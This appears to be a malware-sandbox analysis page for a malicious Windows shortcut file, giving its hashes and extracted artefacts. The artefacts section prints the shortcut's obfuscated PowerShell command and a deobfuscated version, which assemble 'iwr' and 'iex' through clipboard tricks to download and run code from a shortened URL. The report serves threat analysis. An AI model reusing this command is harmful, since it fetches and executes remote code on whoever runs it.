Malicious

735c35446293b59551deee9aa8ec335f

LNK File
|
MD5: 735c35446293b59551deee9aa8ec335f
|
Size: 2.3 KB
|
application/x-ms-shortcut

Infection Chain

Summary by MalvaGPT

Characteristics

Hash	Hash Value
MD5	735c35446293b59551deee9aa8ec335f
Sha1	c15a54cff61d80a1f19cc899713a95bef5b3cdd2
Sha256	2a70950431aa3f0c271658944ea052ce07d315e2d41e9a9c631a9b49c1a7366b
Sha384	8831ac48b82002f61fc60492c1b445ec9de1c1abddd586e497cbe49cc1e2b1b39265c5c03ac683151e990b96424f5284
Sha512	51503e869bf0ab32bb8bbf8974687035b292a4c76da2676473eee342e53cd5ea17c61582b41e74cdd77575e1f19b0223cd632d4f18ffd9ba3300b9d512e32f57
SSDeep	48:8rgngnBH14RzUQO/ilQOr6x1FPdLXuHvBmBNab+:8rgng34RzUQOUQOeJFuPBmBN
TLSH	1241A21527E41529F2F78B32583B7614CA3AFD5F9D32CD1D0184C14C1462A14E92AFBB

File Structure

Artefacts

Name0	Value
LNK: Command Execution	conhost.exe powershell set-clipboard i; sleep 1; sal $DebugPreference ('sA'+'L'); SilentlyContinue $PSSessionApplicationName((Get-Clipboard)+'wr'); SilentlyContinue $env:SESSIONNAME((Get-Clipboard)+'ex'); console (wsman ('tinyurl.com/35t9kjvh'))
Deobfuscated PowerShell	Set-Clipboard "i" sleep 1 sal $DebugPreference "sAL" silentlycontinue $PSSessionApplicationName ((Get-Clipboard) + "wr") silentlycontinue $env:SESSIONNAME ((Get-Clipboard) + "ex") console (wsman "tinyurl.com/35t9kjvh")

735c35446293b59551deee9aa8ec335f (2.3 KB)

File Structure

Characteristics

No malware configuration were found at this point.

Artefacts

Name0	Value	Location
LNK: Command Execution	conhost.exe powershell set-clipboard i; sleep 1; sal $DebugPreference ('sA'+'L'); SilentlyContinue $PSSessionApplicationName((Get-Clipboard)+'wr'); SilentlyContinue $env:SESSIONNAME((Get-Clipboard)+'ex'); console (wsman ('tinyurl.com/35t9kjvh')) Malicious	735c35446293b59551deee9aa8ec335f
Deobfuscated PowerShell	Set-Clipboard "i" sleep 1 sal $DebugPreference "sAL" silentlycontinue $PSSessionApplicationName ((Get-Clipboard) + "wr") silentlycontinue $env:SESSIONNAME ((Get-Clipboard) + "ex") console (wsman "tinyurl.com/35t9kjvh") Malicious	735c35446293b59551deee9aa8ec335f > LNK CommandLine > [PowerShell Command]

You must be signed in to post a comment.

An error has occurred. This application may no longer respond until reloaded. Reload 🗙